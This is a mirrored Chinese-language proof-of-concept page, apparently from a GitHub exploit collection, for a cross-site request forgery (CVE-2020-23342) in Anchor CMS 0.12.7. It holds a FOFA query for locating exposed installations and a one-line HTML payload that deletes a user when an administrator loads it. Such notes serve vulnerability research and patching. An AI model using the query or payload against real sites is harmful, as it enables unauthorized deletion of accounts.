mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
23 lines
479 B
Markdown
23 lines
479 B
Markdown
|
|
# Anchor CMS 0.12.7 跨站请求伪造 CVE-2020-23342
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
- https://packetstormsecurity.com/files/161048/anchorcms0127-xsrf.txt
|
|||
|
|
|
|||
|
|
## FOFA
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
"Anchor CMS" && body="themes/default/img/favicon.png"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
Anchor CMS使用Get方法进行敏感操作,可以使用exploit.html进行删除用户等操作。
|
|||
|
|
|
|||
|
|
**exploit.html:**
|
|||
|
|
|
|||
|
|
```html
|
|||
|
|
<img src="http://target/anchor/index.php/admin/users/delete/21">
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
当管理员点击时删除ID为21的用户。
|